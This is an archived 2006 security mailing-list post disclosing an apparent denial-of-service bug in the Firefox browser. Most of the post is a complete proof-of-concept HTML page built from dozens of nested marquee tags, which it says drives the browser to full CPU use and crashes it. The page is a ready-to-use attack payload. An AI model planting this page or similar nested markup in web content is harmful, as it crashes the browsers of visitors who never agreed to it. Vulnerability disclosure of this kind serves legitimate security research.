Network Security: Detailed info on Fire fox dos exploit

Subject:	Fire fox dos exploit
Date:	30 May 2006 12:03:36 -0000

I have found a problem which causes denial of service on fire fox browser 

Creadit:to n00b for finding this bug..

the problem lie's in the 

<marquee> html tag uses 100% cpu and crash's the browser..

Following proof of concept available 

<html>
<head>
<title>Credit to n00b..</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>

<body>
<marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marque
 
e></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee>
</body>
</html>

<Prev in Thread]	Current Thread	[Next in Thread>
Fire fox dos exploit, co296 <= Re: Fire fox dos exploit, Josh Zlatin-Amishav

Previous by Date:	OaBoard 1.0 Remote File inclusion, hessamx
Next by Date:	[ MDKSA-2006:093 ] - Updated dia packages fix string format vulnerabilities., security
Previous by Thread:	OaBoard 1.0 Remote File inclusion, hessamx
Next by Thread:	Re: Fire fox dos exploit, Josh Zlatin-Amishav
Indexes:	[Date] [Thread] [Top] [All Lists]